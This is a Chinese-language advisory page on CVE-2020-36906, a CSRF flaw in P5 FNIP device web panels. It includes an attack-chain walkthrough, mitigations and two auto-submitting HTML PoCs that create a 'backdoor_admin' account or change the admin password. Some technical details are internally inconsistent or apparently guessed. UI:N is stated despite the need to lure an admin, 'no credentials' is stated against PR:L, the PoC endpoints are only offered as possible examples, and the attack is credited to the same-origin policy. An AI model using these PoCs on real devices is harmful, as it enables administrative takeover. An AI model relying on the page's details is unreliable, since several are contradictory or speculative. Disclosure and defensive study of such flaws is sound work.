CVE-2020-36906 P5 FNIP设备跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2020-36906

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

P5 FNIP-8x16A, P5 FNIP-4xSH

漏洞概述

CVE-2020-36906是影响P5 FNIP-8x16A和FNIP-4xSH设备1.0.20版本的一个中等严重性跨站请求伪造（CSRF）漏洞。该漏洞由VulnCheck发现并披露，CVSS 3.1评分达到4.3分，属于中危级别。跨站请求伪造是一种基于Web的攻击方式，攻击者利用已认证用户的身分，诱导用户的浏览器向受信任的站点发送恶意请求。由于Web应用程序无法充分验证请求的来源合法性，攻击者可以在用户不知情的情况下，以该用户的身份执行未授权的操作。在本漏洞中，攻击者可以构造恶意网页，当已认证的设备管理员访问该页面时，浏览器会自动向目标FNIP设备发送管理员权限的请求。这些请求可以包括添加新的管理员账户、修改现有用户密码、变更系统配置等高危操作。由于攻击过程无需用户交互（UI:N），且攻击者无需获取任何凭据即可利用该漏洞，因此对使用受影响设备的组织构成严重安全风险。攻击成功的关键在于用户必须已经登录到FNIP设备的管理界面，这使得内部网络用户或通过VPN访问设备的远程用户成为主要攻击目标。

技术细节

P5 FNIP-8x16A和FNIP-4xSH设备的Web管理界面存在CSRF防护机制缺失问题。攻击者通过精心构造的HTML页面或恶意链接，利用已认证用户的浏览器向设备发送HTTP请求。由于设备服务器未正确实施CSRF令牌验证或来源检查机制，服务器无法区分合法用户操作与攻击者伪造的请求。攻击向量为网络远程发起（AV:N），攻击者只需诱骗已登录的管理员访问恶意页面即可。攻击者可利用此漏洞执行以下操作：1）通过POST请求添加新的管理员账户，如/api/users/add或/admin/user_create等端点；2）修改现有管理员密码；3）更改系统网络配置；4）禁用安全功能或开启后门。由于攻击利用的是浏览器的同源策略特性，所有支持的浏览器都可能成为攻击媒介。攻击者通常将恶意代码托管在外部服务器，或通过钓鱼邮件、社交工程等方式传播恶意链接。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者首先识别目标组织使用的P5 FNIP设备型号（FNIP-8x16A或FNIP-4xSH），并确定设备的IP地址或域名。攻击者通过Shodan、ZoomEye等搜索引擎或DNS枚举获取目标设备信息。

STEP 2

步骤2：构造恶意页面

攻击者基于目标设备的Web管理接口API，构造包含自动提交表单的恶意HTML页面。表单内容针对添加管理员用户或修改密码等敏感操作，包含必要的请求参数。

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、即时通讯、社交媒体或恶意链接等渠道，诱导已认证的设备管理员访问构造好的恶意页面。攻击者常伪装成系统更新通知或技术支持消息。

STEP 4

步骤4：触发CSRF请求

当管理员浏览器加载恶意页面时，JavaScript自动提交隐藏表单。由于浏览器会自动携带目标域的Cookie和认证信息，请求以管理员身份成功到达FNIP设备服务器。

STEP 5

步骤5：执行未授权操作

FNIP设备服务器收到请求后，因缺少CSRF令牌验证，将请求视为合法管理员操作。服务器执行添加后门账户、修改密码或变更配置等指令，完成攻击。

STEP 6

步骤6：持久化控制

攻击者使用新创建的管理员账户登录FNIP设备，获得完整管理权限后可进一步部署恶意固件、窃取敏感数据或横向移动攻击内网其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2020-36906: P5 FNIP CSRF Admin Creation -->
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait...</h1>
    <form id="csrfForm" action="http://TARGET_FNIP_IP/admin/user_create" method="POST" enctype="application/x-www-form-urlencoded">
        <!-- Add new admin user -->
        <input type="hidden" name="username" value="backdoor_admin">
        <input type="hidden" name="password" value="P@ssw0rd123">
        <input type="hidden" name="role" value="admin">
        <input type="hidden" name="action" value="create">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- Alternative PoC: Change admin password -->
<!DOCTYPE html>
<html>
<body>
    <form id="passChange" action="http://TARGET_FNIP_IP/admin/change_password" method="POST">
        <input type="hidden" name="current_password" value="attacker_controlled">
        <input type="hidden" name="new_password" value="NewP@ssw0rd">
        <input type="hidden" name="confirm_password" value="NewP@ssw0rd">
    </form>
    <script>document.getElementById('passChange').submit();</script>
</body>
</html>

影响范围

P5 FNIP-8x16A 固件版本 <= 1.0.20

P5 FNIP-4xSH 固件版本 <= 1.0.20

防御指南

临时缓解措施

在厂商发布正式修复版本前，可采取以下临时缓解措施：1）禁用FNIP设备的Web管理界面远程访问，仅允许通过内网带外管理方式访问；2）配置IP白名单限制，仅允许受信任的管理IP访问管理端口；3）监控Web服务器日志，关注异常的批量用户创建或配置变更请求；4）对管理员进行安全意识培训，提高对钓鱼攻击的警惕性；5）使用浏览器安全插件阻止自动表单提交；6）考虑部署WAF（Web应用防火墙）规则检测和阻止CSRF攻击特征。